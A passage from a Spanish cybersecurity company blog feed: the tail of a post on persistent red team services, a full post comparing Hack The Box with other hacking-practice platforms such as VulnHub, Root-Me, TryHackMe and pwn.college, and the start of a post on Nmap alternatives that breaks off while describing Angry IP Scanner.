Condensed;"><br /></span></div><div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Hemos conocido cuales son las ventajas de un red team, pero… ¿Es todo tan sencillo como parece? ¿Existe alguna limitación a la hora de llevar a cabo este tipo de ejercicios?</span></div><h4 style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Limitaciones del red team tradicional</span></h4><div style="text-align: justify;"><ul><li><span style="font-family: Barlow Semi Condensed;"><b><u>Temporalidad:</u></b> mientras que los ciberdelincuentes tienen recursos y tiempo (casi) infinitos, un ejercicio de Red Team tiene fecha de inicio y de fin. Las vulnerabilidades aprovechadas son las identificadas durante el transcurso del ejercicio. </span></li></ul><ul><li><span style="font-family: Barlow Semi Condensed;"><b><u>Capacidad:</u></b> no se verifica la capacidad de la organización para mitigar vulnerabilidades recientes, mientras que tras un ejercicio de pentesting sí que es habitual realizar un retest.</span></li></ul><ul><li><span style="font-family: Barlow Semi Condensed;"><b><u>Novedad:</u> </b>por norma general, no se evalúan 0day, y tampoco se verifican aspectos relativos a ciberinteligencia en términos de vulnerabilidades, ni técnicas de ataque descubiertas recientemente.</span></li></ul><ul><li><span style="font-family: Barlow Semi Condensed;"><b><u>Infraestructura:</u></b> la infraestructura requerida para el ejercicio de Red Team(que despliega el equipo atacante), se elimina cuando finaliza el ejercicio, y supone un esfuerzo de implementación que reduce las ventanas de ataque, por lo que el estudio del dimensionamiento del ejercicio es algo clave.</span></li></ul></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><h3 style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Red Team 2.0 (persistente)</span></h3><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Son muchas las ventajas que ofrece un ejercicio de red team con respecto un pentesting tradicional, pero no podemos perder de vista todas y cada una de las limitaciones que comentábamos anteriormente, que restan potencial y menguan las capacidades de estos ejercicios.</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><b>Zerolynx</b> ha querido ir más allá, y romper con estas limitaciones presentando un red team que podríamos llamar de nueva generación (NG - <b>NextGeneration</b>), que responde a su constante esfuerzo por innovar y llevar al mercado <b>servicios disruptivos</b> que se adapten a los cambios de la industria. </span></div><h4 style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">¿De qué se trata? </span></h4><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Hablamos de un servicio de RedTeam “persistente”, con un enfoque de simulación de amenazas más prolongado, mediante evaluaciones de seguridad llevadas a cabo de forma regular y continua en el tiempo. </span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Esto permitiría al equipo atacante adaptar y ajustar sus tácticas, técnicas y procedimientos (TTP) para <b>emular amenazas más recientes y realistas</b>, así como explotar vulnerabilidades recientemente publicadas (zero days), lo que ayudaría además a medir la resiliencia general de la organización ante estas nuevas técnicas de ataque (reduciendo significativamente el time-to-market de prueba de vulnerabilidades y técnicas de ataque).</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Al ser un servicio continuo y a medio/largo plazo en el tiempo <b>no requiere desmontar la infraestructura</b> una vez finalizado el ejercicio, sino que se mantiene y evoluciona, aprovechando el tiempo.</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Gracias a su persistencia, el equipo atacante dispone de <b>más tiempo para conocer en profundidad la infraestructura del cliente</b> tal y como lo haría un insider tras permanecer meses/años estudiando a su víctima.</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">El equipo de purple team (conformado por miembros de red y blue team) se consolida en el tiempo, lo que permite <b>trabajar más estréchame y alcanzar una relación de confianza </b>de la cual el equipo de blue team puede nutrirse para mejorar sus capacidades de detección y respuesta a largo plazo.</span></div><div style="text-align: justify;"><br /></div></div><a href="https://www.linkedin.com/in/alejandro-au%C3%B1%C3%B3n-le%C3%B3n-86820892/">Alejandro Auñón</a>, Offensive Security Analyst at <a href="http://www.zerolynx.com/es">Zerolynx</a>.Celia Catalánhttp://www.blogger.com/profile/17028922234459073806noreply@blogger.com0Madrid, España40.4167754 -3.703790212.106541563821153 -38.8600402 68.727009236178844 31.4524598tag:blogger.com,1999:blog-7938680518783212855.post-88707020722185870412024-01-08T09:00:00.002+01:002024-01-08T19:29:56.264+01:00Alternativas de entrenamiento a Hack The Box<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj-V741eBWgZRgoRwW5F88LlzaDsU8zoA8Fftln6DE5mEPFP7xKM4g6q6-z2zVRuKmmypiXqss8wVdrCRAthR7D5nPwwOczTIKSNhg-gF6_bdUoN3gfHN9TT1JRfXMqzyBXiB3rXZEFjwUSFKAzGbSAgYg-zyCtijeNnvlJvDjS93DEboQtUA4HsutdBap6/s1920/Alternativas%20de%20entrenamiento%20a%20Hack%20The%20Box.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1080" data-original-width="1920" height="360" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj-V741eBWgZRgoRwW5F88LlzaDsU8zoA8Fftln6DE5mEPFP7xKM4g6q6-z2zVRuKmmypiXqss8wVdrCRAthR7D5nPwwOczTIKSNhg-gF6_bdUoN3gfHN9TT1JRfXMqzyBXiB3rXZEFjwUSFKAzGbSAgYg-zyCtijeNnvlJvDjS93DEboQtUA4HsutdBap6/w640-h360/Alternativas%20de%20entrenamiento%20a%20Hack%20The%20Box.png" width="640" /></a></div><p style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></p><p style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Hoy en día son cientos las herramientas que uno tiene si quiere formarse en el ámbito de la ciberseguridad. Por supuesto, tenemos el método académico, con másteres y cursos especializados en la materia, pero solo hace falta una pequeña búsqueda en la red para darse cuenta de que existen alternativas. ¡Y las hay a montones! Cursos online, laboratorios, foros de internet, vídeos... y la lista continua. Pero sin duda, si una herramienta destaca por encima de las demás (por lo menos en el mundo del hacking), esa es la página web de <b>Hack The Box</b>.</span></p><h3 style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">¿Qué es Hack The Box?</span></h3><div class="separator" style="clear: both; text-align: justify;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjavVLziIdZ6vQbf0ED2U1iybYbpL8sMJQd2yb6wr-zT_6OPuEPZ6TOIsJ2FO2qlfnouGTIyLKPmEq6kwUXxdgpryQ7c8MNAxxwPapuD3t8x0BRcbza-AiIrK0LKvjDbCkHJ7dNtHH22N1dRCdt6AyI8ERlevxSYvC80FhbVE9GohMkpPr-3NUtWv542ns3/s735/hackthebox.png" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Barlow Semi Condensed;"><img border="0" data-original-height="315" data-original-width="735" height="274" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjavVLziIdZ6vQbf0ED2U1iybYbpL8sMJQd2yb6wr-zT_6OPuEPZ6TOIsJ2FO2qlfnouGTIyLKPmEq6kwUXxdgpryQ7c8MNAxxwPapuD3t8x0BRcbza-AiIrK0LKvjDbCkHJ7dNtHH22N1dRCdt6AyI8ERlevxSYvC80FhbVE9GohMkpPr-3NUtWv542ns3/w640-h274/hackthebox.png" width="640" /></span></a></div><span style="font-family: Barlow Semi Condensed;"><div style="text-align: justify;"><br /></div></span><p style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><b>Hack The Box </b>(o HTB para abreviar) es una plataforma orientada a la práctica de técnicas de hacking. Esta web proporciona también cursos a través de una academia e incluso distintas certificaciones con sus respectivas clases y exámenes. Pero la funcionalidad principal que le ha dado su fama son los laboratorios de <b>CTFs</b> (Capture The Flag), y funcionan de la siguiente manera:</span></p><p style="text-align: justify;"></p><ul><li><span style="font-family: Barlow Semi Condensed;">Un usuario descarga un archivo de configuración para conectarse a través de una VPN a la red de HTB.</span></li></ul><ul><li><span style="font-family: Barlow Semi Condensed;">Una vez tiene acceso a la red, puede elegir una máquina a la que "unirse". Esta máquina se trata de un sistema vulnerable que contiene dos archivos o flags.</span></li></ul><ul><li><span style="font-family: Barlow Semi Condensed;">El usuario a través de distintas técnicas debe vulnerar el sistema para obtener acceso tanto a la flag de usuario como a la flag de administrador del sistema.</span></li></ul><ul><li><span style="font-family: Barlow Semi Condensed;">Una vez obtenidos estos archivos, se introduce su contenido en la página de HTB para "ownear" (superar) la máquina.</span></li></ul><p></p><p style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Esta es la funcionalidad que tanta fama le ha dado a la página, pero como hemos mencionado antes, HTB también ofrece una <b>academia </b>para formarse de un modo más guiado a través de módulos de aprendizaje, para que el usuario pueda aprender sobre la materia que más le interesa. Además, HTB también ofrece a los usuarios <b>certificaciones </b>propias tanto de seguridad ofensiva (Red Team), seguridad defensiva (Blue Team) como de Bug Bounty. Los usuarios pueden llevar a cabo el aprendizaje que proporciona la plataforma y posteriormente realizar el examen para certificarse.</span></p><h3 style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">¿Qué alternativas existen?</span></h3><p style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Si bien Hack The Box es una plataforma excelente tanto para usuarios que se inician en la ciberseguridad como para aquellos que quieren poner en práctica sus conocimientos, es importante saber que esta página no es la única opción. Existe competencia que, dependiendo de lo que busque el usuario, puede llegar a ser una mejor alternativa. Entre esta competencia hablaremos de las siguientes páginas web:</span></p><p style="text-align: justify;"></p><ul><li><span style="font-family: Barlow Semi Condensed;">VulnHub</span></li></ul><ul><li><span style="font-family: Barlow Semi Condensed;">Root-Me</span></li></ul><ul><li><span style="font-family: Barlow Semi Condensed;">TryhackMe</span></li></ul><ul><li><span style="font-family: Barlow Semi Condensed;">pwn.college</span></li></ul><p></p><h3 style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">VulnHub</span></h3><p style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><b>VulnHub </b>es una plataforma que, al igual que HTB, está orientada a practicar y aprender técnicas de hacking mediante <b>CTFs</b>. Hasta aquí parece que VulnHub y HTB ofrecen el mismo servicio, sin embargo, mientras HTB ofrece acceso una red con máquinas vulnerables, VulnHub mantiene una <b>filosofía DIY</b> (Do It Yourself), donde el usuario descarga el archivo OVA de la máquina vulnerable y la <b>configura de manera local</b>. Esto permite al usuario configurar la máquina a sus preferencias y trabajar sin necesidad de tener conexión a internet.</span></p><div class="separator" style="clear: both; text-align: justify;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmitBuClG29hMGwsHrN4APyjcP14xlDs94ZrZDIo9xBz_62g4kHaj8RMSTf_MplS7BSj1Yt0glloJMg2gEOhiaEZh4J_hu5iOBvA9bYU6wlQmaH8_UxjAcQI1-85qDHmwnkjHPepgP3FLqpgq89UOd7PCYFsh1YebXB4jLEtJhs5eahj2RXcLqCWDfbaOw/s1424/vulnhub.png" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Barlow Semi Condensed;"><img border="0" data-original-height="659" data-original-width="1424" height="296" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmitBuClG29hMGwsHrN4APyjcP14xlDs94ZrZDIo9xBz_62g4kHaj8RMSTf_MplS7BSj1Yt0glloJMg2gEOhiaEZh4J_hu5iOBvA9bYU6wlQmaH8_UxjAcQI1-85qDHmwnkjHPepgP3FLqpgq89UOd7PCYFsh1YebXB4jLEtJhs5eahj2RXcLqCWDfbaOw/w640-h296/vulnhub.png" width="640" /></span></a></div><span style="font-family: Barlow Semi Condensed;"><div style="text-align: justify;"><br /></div></span><p style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Por otro lado, aunque el entorno de trabajo sea en un principio más seguro ya que no estamos accediendo a una red externa (es importante recalcar que HTB asegura securizar correctamente sus entornos de trabajo online), como podemos leer en la propia página web, "VulnHub es un recurso comunitario gratuito, por lo que no podemos verificar las máquinas que se nos proporcionan. Antes de descargar, lea nuestras secciones de preguntas frecuentes que tratan sobre los<b> peligros de ejecutar máquinas virtuales desconocidas </b>y nuestras sugerencias para "protegerse a sí mismo y a su red".</span></p><p style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">En cuanto a términos económicos, debemos tener en cuenta que HTB no es completamente gratuito, ya que sin pagar no tendríamos acceso a todas las máquinas disponibles, y tanto la academia como las certificaciones tienen un precio mensual o anual. Por lo contrario, VulnHub es una <b>página 100%</b> gratuita, y desde el principio el usuario tiene acceso a todas las máquinas que proporciona la plataforma.</span></p><h3 style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Root-Me</span></h3><p style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Root-Me es una plataforma más humilde y muy centrada en su propia <b>comunidad</b>. Al igual que las anteriores, se centra en ofrecer a los usuarios distintos <b>retos y CTFs</b> como método de práctica y aprendizaje.</span></p><p style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Al ser una web comunitaria, permite a los usuarios interactuar entre ellos mediante <b>foros </b>o <b>servidores de Discord</b> lo que sirve de gran soporte para aquellos que puedan necesitar ayuda. Además, la propia página fomenta la contribución mediante un apartado que permite al público <b>crear sus propios CTFs y retos</b>. Una vez la página valida la máquina creada, esta queda disponible para el resto de los usuarios y al creador se le <b>recompensa económicamente</b>.</span></p><div class="separator" style="clear: both; text-align: justify;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFa2d-BPNv3rqyDSFU_iMn5lHkK9Adr9Yec_Ph_c3vk1T4RSHS0V7xWhnnMikBI-XCyyRpVwIcf9Sh59AkT535wofWh6jPQvopT9ICeZ8y6FmWiuFKMLOKj_2PhFUPFtt_NDkIroXhUyxLgO4Q9D4Tudo6vr_RFzKS1_8b8BeHJ-cqD7FXwj5p0F20wZjh/s701/RootMe.jpg" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Barlow Semi Condensed;"><img border="0" data-original-height="244" data-original-width="701" height="222" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFa2d-BPNv3rqyDSFU_iMn5lHkK9Adr9Yec_Ph_c3vk1T4RSHS0V7xWhnnMikBI-XCyyRpVwIcf9Sh59AkT535wofWh6jPQvopT9ICeZ8y6FmWiuFKMLOKj_2PhFUPFtt_NDkIroXhUyxLgO4Q9D4Tudo6vr_RFzKS1_8b8BeHJ-cqD7FXwj5p0F20wZjh/w640-h222/RootMe.jpg" width="640" /></span></a></div><span style="font-family: Barlow Semi Condensed;"><div style="text-align: justify;"><br /></div></span><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Por supuesto, al ser una plataforma creada por y para los usuarios, es <b>completamente gratuita</b> y cualquier persona puede contribuir o participar en el proyecto.</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><h3 style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">TryHackMe</span></h3><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Toca hablar del elefante en la habitación, ya que TryHackMe es, sin duda, el <b>principal competidor</b> de Hack The Box. TryHackMe, a diferencia de Hack The Box y el resto de las plataformas que hemos mencionado, centra su contenido en el aprendizaje guiado mediante lo que la plataforma denomina "learning paths" o "caminos de aprendizaje" en español. Estos <b>"learning paths"</b> contienen distintos <b>módulos con teoría</b> y una serie de <b>mini laboratorios</b> donde el usuario pone en práctica lo que se le ha explicado anteriormente.</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div class="separator" style="clear: both; text-align: justify;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgoKiCbxhWyuT-zlChy_zEepcDxMnpr3nzcinZ-O0q9mVUB6TzKK5t7u9Did-pfB-Izcz3PMvXGm1SdGErqa_896J_vxbGEcGX8bv1umj_Eo5-9JTLNI6P9clzpYt6H9fsheKfm8qH_GUtqyRjwtVDTKqew2LAQ8ujprUuYu81i1pq2KTOne8mWqzOYu23A/s772/tryhackme.png" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Barlow Semi Condensed;"><img border="0" data-original-height="360" data-original-width="772" height="298" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgoKiCbxhWyuT-zlChy_zEepcDxMnpr3nzcinZ-O0q9mVUB6TzKK5t7u9Did-pfB-Izcz3PMvXGm1SdGErqa_896J_vxbGEcGX8bv1umj_Eo5-9JTLNI6P9clzpYt6H9fsheKfm8qH_GUtqyRjwtVDTKqew2LAQ8ujprUuYu81i1pq2KTOne8mWqzOYu23A/w640-h298/tryhackme.png" width="640" /></span></a></div><span style="font-family: Barlow Semi Condensed;"><div style="text-align: justify;"><br /></div></span><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Este método está centrado sobre todo en enseñar a <b>gente que se inicia en el mundo del hacking</b> y la ciberseguridad, formándolos desde el inicio en materias como hacking web, técnicas de escalado de privilegios, herramientas como Burp Suite, Metasploit... y mucho más. Por otra parte, al igual que HTB tiene su propia academia que sigue el estilo de enseñanza de TryHackMe, esta también tiene su propio apartado de práctica con <b>CTFs</b> y retos para que los usuarios prueben sus habilidades.</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">En términos económicos, a pesar de contener módulos gratuitos, y al igual que Hack The Box, tiene un coste económico si se quiere disfrutar de todo lo que ofrece la página. En este sentido, sin embargo, TryHackMe es una<b> opción más económica</b> con un precio anual de 100 euros (menos, en caso de ser estudiante) para acceder a todos los módulos, mientras que HTB tiene un precio de 410 euros (791 para el pack premium).</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Por supuesto, no todo son ventajas, ya que, como hemos indicado al comienzo, HTB proporciona 3 certificaciones con mucho contenido teórico y sus propios exámenes, cosa que TryHackMe no ofrece. Y, por otra parte, existe un <b>problema con las VPNs</b> de TryHackMe (que no pretenden solucionar), ya que, al conectarse a la VPN para poder acceder a una máquina, existe una conectividad entre los usuarios que estén interactuando con esta, lo que los hace al mismo tiempo vulnerables a los ataques del resto de usuarios</span></div></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div class="separator" style="clear: both; text-align: justify;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhmTkbyKl9eZHHVuDhw-C4dCKtiyxRqhscQIS68Q7rn4OvT2vCkrF3mlm20ZfllqrC7Er0khvSEpYfBBLJc-qI7yRgRJMq-PqBqERPfNl_be_HlRSnW6hwaGoHs7Wn2T8E0mvZT_zkmwwh8njKv9_qaeCoLuCjvo-YLhMLLBqMXVq8ULMDBWt-3qQ3mH1gt/s713/Imagen2.jpg" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Barlow Semi Condensed;"><img border="0" data-original-height="209" data-original-width="713" height="188" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhmTkbyKl9eZHHVuDhw-C4dCKtiyxRqhscQIS68Q7rn4OvT2vCkrF3mlm20ZfllqrC7Er0khvSEpYfBBLJc-qI7yRgRJMq-PqBqERPfNl_be_HlRSnW6hwaGoHs7Wn2T8E0mvZT_zkmwwh8njKv9_qaeCoLuCjvo-YLhMLLBqMXVq8ULMDBWt-3qQ3mH1gt/w640-h188/Imagen2.jpg" width="640" /></span></a></div><span style="font-family: Barlow Semi Condensed;"><div style="text-align: justify;"><br /></div></span><div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Sin embargo, existen métodos para mitigar este problema, siendo el más popular un repositorio del usuario de GitHub Wh1teDrvg0n (<a href="https://github.com/Wh1teDrvg0n/safeVPN-THM">https://github.com/Wh1teDrvg0n/safeVPN-THM</a>). Este repositorio contiene un script con una serie de reglas de iptables para permitir únicamente tráfico de entrada de la máquina de TryHackMe, mitigando así cualquier tipo de intento de ataque de otros usuarios.</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><h3 style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">pwn.college</span></h3><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Finalmente, nos gustaría dar crédito a plataformas más pequeñas como es el caso de pwn.college. Esta plataforma se parece a TryHackMe, puesto que está <b>completamente orientada a la enseñanza</b>. Contiene distintos cursos con <b>videos y diapositivas entretenidas</b> que facilitan mucho el aprendizaje. Una vez se termina con la teoría la página proporciona una serie de retos para poner en práctica lo aprendido.</span></div></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div class="separator" style="clear: both; text-align: justify;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfCZ0I_AcoTnlmJMznOAps3hnzfruQuXubI3U4K4DFMWnHOKIs8j7YOJ-dQDRuVUMgvcli0HjnbEyjrGCyXyGrajZDQbsqtzzk1rtypPFsimbmH3lFecdsMODicO_6KhjsD0Jk85bgkHYK0bQC9Ge9DvejG_TZebTf-11Piwf2-lBNOcV2zV1j0BIedrN0/s709/talkingweb.png" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Barlow Semi Condensed;"><img border="0" data-original-height="456" data-original-width="709" height="412" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfCZ0I_AcoTnlmJMznOAps3hnzfruQuXubI3U4K4DFMWnHOKIs8j7YOJ-dQDRuVUMgvcli0HjnbEyjrGCyXyGrajZDQbsqtzzk1rtypPFsimbmH3lFecdsMODicO_6KhjsD0Jk85bgkHYK0bQC9Ge9DvejG_TZebTf-11Piwf2-lBNOcV2zV1j0BIedrN0/w640-h412/talkingweb.png" width="640" /></span></a></div><span style="font-family: Barlow Semi Condensed;"><div style="text-align: justify;"><br /></div></span><div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Cabe destacar que, además de estos módulos de aprendizaje, la plataforma cuenta con un <b>canal de Twitch</b> donde se dan clases en directo. Esto permite a los usuarios interactuar en tiempo real con la persona que da la clase para hacer preguntas y aprender lo máximo posible.</span></div><h3 style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Conclusión</span></h3><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Por supuesto, estas no son las únicas alternativas. Existen otras páginas como OverTheWire, PentesterLab, Hacker101, PentesterAcademy o Virtual Hacking Labs entre otras, y antes de elegir cualquiera de ellas es recomendable informarse sobre su funcionamiento, precios, seguridad...</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Lo que queremos mostrar con este post es que Hack The Box, pese a ser una excelente elección tanto para formarse como para practicar, no es la única opción y que, tan solo con una pequeña búsqueda, podemos encontrar opciones que se ajustan más a lo que buscamos.</span></div></div><div style="text-align: justify;"><br /></div><div style="text-align: justify;"><br /></div><blockquote style="border: none; margin: 0px 0px 0px 40px; padding: 0px;"><blockquote style="border: none; margin: 0px 0px 0px 40px; padding: 0px;"><blockquote style="border: none; margin: 0px 0px 0px 40px; padding: 0px;"><blockquote style="border: none; margin: 0px 0px 0px 40px; padding: 0px;"><blockquote style="border: none; margin: 0px 0px 0px 40px; padding: 0px;"><blockquote style="border: none; margin: 0px 0px 0px 40px; padding: 0px;"><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><a href="https://www.linkedin.com/in/egoitz-san-martin-igarza-848174183/">Egoitz San Martin Igarza</a>, Penetration test at <a href="https://www.osaneconsulting.com/">Osane</a>, <a href="http://www.zerolynx.com/es">Grupo Zerolynx</a>.</span></div></blockquote></blockquote></blockquote></blockquote></blockquote></blockquote>Celia Catalánhttp://www.blogger.com/profile/17028922234459073806noreply@blogger.com0Madrid, España40.4167754 -3.703790212.106541563821153 -38.8600402 68.727009236178844 31.4524598tag:blogger.com,1999:blog-7938680518783212855.post-37839728764090701352024-01-02T09:00:00.003+01:002024-01-07T19:31:30.424+01:00Herramientas alternativas a NMAP<div><div style="text-align: justify;"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfFc3blthwywD7dw-1SZgzih9jhyNyxlOT_XiQnQ_e2s_jCjvqJxOE941MTc6NnQQ4SzWNPkd5_9zPPVzjamDTURY7JYAt0_CuLXJsQIhLENurW9eQ8iGLmMPyq6HWE-jJ4nJByPl709UIdWP9e_MK2GBCNE0r62eutsNeEynzcOIUyxfLZTVl5Ou8ViDC/s1920/Dise%C3%B1o%20sin%20t%C3%ADtulo%20(19).jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1080" data-original-width="1920" height="360" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfFc3blthwywD7dw-1SZgzih9jhyNyxlOT_XiQnQ_e2s_jCjvqJxOE941MTc6NnQQ4SzWNPkd5_9zPPVzjamDTURY7JYAt0_CuLXJsQIhLENurW9eQ8iGLmMPyq6HWE-jJ4nJByPl709UIdWP9e_MK2GBCNE0r62eutsNeEynzcOIUyxfLZTVl5Ou8ViDC/w640-h360/Dise%C3%B1o%20sin%20t%C3%ADtulo%20(19).jpg" width="640" /></a></div></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">La utilidad Nmap, también conocida como Network Mapper, ofrece la capacidad de identificar hosts y servicios dentro de una red, generando un detallado mapa que revela la topología de dicha red. Este proceso suministra al usuario datos cruciales acerca de los dispositivos conectados, tales como direcciones IP, puertos abiertos, servicios activos y las versiones de software correspondientes. Aunque Nmap destaca como la herramienta más popular para el escaneo de redes, existen otras herramientas similares que merecen mencionarse. Algunas de estas alternativas son: </span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><h4 style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">ANGRY IP SCANNER</span></h4><span style="font-family: Barlow Semi Condensed;"><div style="text-align: justify;"> En primer lugar, se encuentra el escáner Angry IP. Este software opera a través de una interfaz que presenta datos de manera clara y directa, facilitando al usuario la realización de un exhaustivo escaneo de la red. Asimismo, ofrece la posibilidad de seleccionar el rango de direcciones IP que deseamos analizar.</div></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg7-zp405qxVh9EKVQQ2_Qr0d1-puZDK5ueVs-x9AzLPirsCulUpNAMnNTeYgj5t8Oft4kgf3Y9cYtEBK04PkU9Hp0PZrxZxXvPmOQ7sSv4vmt4eN5wAvDhjY3ozYZnQ6dm3XJBSihAFsQx0ZeeamYLMbibE9ctrVwhWjls4gg1thC30ZoD3cDlWNXbiwX1/s1975/Imagen1.png" style="margin-left: 1em; margin-right: 1em; text-align: center;"><span style="font-family: Barlow Semi Condensed;"><img border="0" data-original-height="382" data-original-width="1975" height="124" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg7-zp405qxVh9EKVQQ2_Qr0d1-puZDK5ueVs-x9AzLPirsCulUpNAMnNTeYgj5t8Oft4kgf3Y9cYtEBK04PkU9Hp0PZrxZxXvPmOQ7sSv4vmt4eN5wAvDhjY3ozYZnQ6dm3XJBSihAFsQx0ZeeamYLMbibE9ctrVwhWjls4gg1thC30ZoD3cDlWNXbiwX1/w640-h124/Imagen1.png" width="640" /></span></a></div><div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><span style="font-family: Barlow Semi Condensed;"><div style="text-align: justify;">También existe la posibilidad de seleccionar los puertos que el usuario desea revisar. </div><div style="text-align: justify;"><br /></div></span><div style="margin-left: 1em; margin-right: 1em; text-align: justify;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhkrR9Nw9rmk1IBJi-eq3CKLXXIFWaGuGDaJMvN80YFx29y2f9oXn5syP0YkgHpfqeQ42ygGVCSVgzA3t0xz3arDl8WRszIxlpMO9MJhgUEm75lrVy-Kiz_-6tDwnIMtD-bGBuMGff1AYs94eYHU-va7EPx9kP0Za7WJGHdGsrabZxpO43jK1kw4hDhjOc1/s1097/Imagen2.png" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Barlow Semi Condensed;"><img border="0" data-original-height="1097" data-original-width="978" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhkrR9Nw9rmk1IBJi-eq3CKLXXIFWaGuGDaJMvN80YFx29y2f9oXn5syP0YkgHpfqeQ42ygGVCSVgzA3t0xz3arDl8WRszIxlpMO9MJhgUEm75lrVy-Kiz_-6tDwnIMtD-bGBuMGff1AYs94eYHU-va7EPx9kP0Za7WJGHdGsrabZxpO43jK1kw4hDhjOc1/w570-h640/Imagen2.png" width="570" /></span></a></div><span style="font-family: Barlow Semi Condensed;"><div style="text-align: justify;"><br /></div><span face="Calibri, sans-serif"><div style="text-align: justify;">Los resultados se muestran en forma de una lista donde se proporciona la siguiente información: </div></span><span face="Calibri, sans-serif"><div style="text-align: justify;"><ul><li>La IP acompañado de un 